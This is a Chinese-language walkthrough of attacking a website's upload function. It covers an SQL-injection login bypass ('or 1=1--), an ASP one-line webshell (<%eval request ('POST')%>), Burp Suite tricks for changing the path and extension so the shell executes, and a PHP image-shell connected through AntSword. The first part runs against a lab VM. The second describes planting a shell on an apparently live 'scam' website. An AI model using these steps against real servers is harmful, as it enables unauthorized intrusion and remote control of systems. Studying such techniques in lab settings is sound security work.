前期准备
软件:burp,中国蚁剑
环境:酷维网站,VM虚拟机
具体操作
1.网站管理打开,进入bookpic目录(C:\Inetpub\cms\cms\bookpic),添加a.asp文件(一句话木马上传点)
2.调出属性,修改为IP,应用后确定
3.用物理机打开网站,进入admin目录,进入http://192.168.1.29/admin/Admin_Login.asp后台管理界面
使用万能密码 账号:admin 'or 1=1-- 密码:任意
进入后去添加公告里找上传点
4.打开burpsuit,配置一下proxy(switchy omega)
上传+绕过有两个方法
方法1
burp绕过(传后格式验证)
制作1.asp一句话木马
文本输入<%eval request ("POST")%>
另存为
在1.asp文件里一句话木马前面多加一些文字信息——为了使文件容量变大,要不然网站识别不了
上传后抓包,修改文件路径为bookpic/a.asp/,再修改文件上传后缀为jpg,放行,拦截关闭
访问路径:IP/bookpic/a.asp/20246215171536061.jpg
没有显示php代码说明解析成功
中国蚁剑连接成功
方法2
制作一句话木马图片(传前格式验证)
1.测试网站
访问上传路径,上传成功
后台数据库也有显示
这里有点问题,jpg蚁剑连不了,要php格式的文件,连接失败
这种适合传前格式验证,上传后bp抓包改jpg后缀为php才能用蚁剑连接
2.其他网站
文件上传漏洞利用(重点讲)
使用burp,点击代理,开启拦截,并打开自带浏览器登录网站前台,寻找可能的文件上传点,发现在个人照片上有上传可能,传入图片马
图片木马制作
创建文本文件,输入 ,另存为jpg格式
上传图片,进行bp拦截,修改thumb的JPEG格式为PHP
发现传输数据使用base64编码,再接使用在线工具进行解密
图片为上传的图片马数据,即证明图片马能上传到诈骗网站
粘贴到burp拦截数据包处,放行数据包
在浏览器中右键头像另外网页打开,查找文件上传路径
打开中国蚁剑进行连接,其中连接密码在图片马中进行设置为abc
成功接入